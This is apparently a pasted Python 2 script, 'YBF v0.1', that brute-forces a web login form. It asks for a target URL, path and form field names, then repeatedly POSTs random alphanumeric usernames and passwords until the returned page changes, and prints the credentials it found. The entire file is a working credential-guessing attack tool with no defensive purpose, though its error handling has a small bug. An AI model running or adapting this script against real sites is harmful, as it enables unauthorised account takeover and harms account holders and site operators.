# Brute Force Program# By Yotamimport httplib, urllib, random, stringdef

1. # Brute Force Program
2. # By Yotam
3.  
4. import httplib, urllib, random, string
5. def bruteforce(url, path, uform, pform, user, max_ulength, max_pass_length, min_ulength, min_pass_length):
6.     chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
7.     headers = {'Content-type' : 'application/x-www-form-urlencoded', 'Accept' : 'text/plain'}
8.     http_conn = httplib.HTTPConnection(url)
9.     # test requset:
10.     http_conn.request('GET', path)
11.     get_test = http_conn.getresponse()
12.     if (get_test.status == 200):
13.         print('successfully connected to ' + url + '\n')
14.         regular_page_content = get_test.read()
15.     else:
16.         print('Error: ' + get_test.status + ' ' + get_test.reason + '\n')
17.         input()
18.         exit()
19.     # send a POST request with incorrect details to get an error page:
20.     http_conn.request('POST', path, urllib.urlencode({uform : user, pform : '........'}), headers)
21.     get_error = http_conn.getresponse()
22.     error_content = get_error.read()
23.     # send a GET request to get a start point:
24.     http_conn.request('GET', path)
25.     get_main = http_conn.getresponse()
26.     main_content = get_main.read()
27.     # the BF loop:
28.     while (main_content == regular_page_content or main_content == error_content):
29.         if (user == ''):
30.             random_length_user = random.randint(min_ulength, max_ulength)
31.             random_char_number = 1
32.             random_string_user = ''
33.             while random_char_number <= random_length_user:
34.                 random_char_user = chars[random.randint(0, len(chars) - 1)]
35.                 random_string_user = random_string_user + random_char_user
36.                 random_char_number = random_char_number + 1
37.             username = random_string_user
38.         else:
39.             username = user
40.         random_length_password = random.randint(min_pass_length, max_pass_length)
41.         random_char_number = 1
42.         random_string_password = ''
43.         while random_char_number <= random_length_password:
44.             random_char_password = chars[random.randint(0, len(chars) - 1)]
45.             random_string_password = random_string_password + random_char_password
46.             random_char_number = random_char_number + 1
47.         password = random_string_password
48.         print('trying username ' + username + ' with password ' + password)
49.         params = urllib.urlencode({uform : username, pform : password})
50.         http_conn.request('POST', path, params, headers)
51.         check_r = http_conn.getresponse()
52.         main_content = check_r.read()
53.         if (main_content != regular_page_content and main_content != error_content):
54.             print('Brute force succeeded!\nUsername: ' + username + '\nPassword: ' + password + '\nURL: ' + url + path)
55.             break
56.         else:
57.             pass
58.     http_conn.close()
59. print 'YBF v0.1'
60. print '\nBy Yotam'
61. print '\n\n'
62. address = raw_input('Enter URL:\n')
63. path = raw_input('enter the path of the file:\n')
64. user_form = raw_input('enter the username input field name:\n')
65. pass_form = raw_input('enter the password input field name:\n')
66. option = input('choose one of this options:\n1) guess the username too.\n2) I have the username. guess only the password.\n')
67. if (option == 1):
68.     uname = ''
69.     u_min_l = input('enter min length for the username:\n')
70.     u_max_l = input('enter max length for the username:\n')
71. elif (option == 2):
72.     u_min_l = 0
73.     u_max_l = 0
74.     uname = raw_input('enter username:\n')
75. p_min_l = input('enter min length for the password:\n')
76. p_max_l = input('enter max length for the password:\n')
77. bruteforce(address, path, user_form, pass_form, uname, u_max_l, p_max_l, u_min_l, p_min_l)
78. print('\n')
79. input()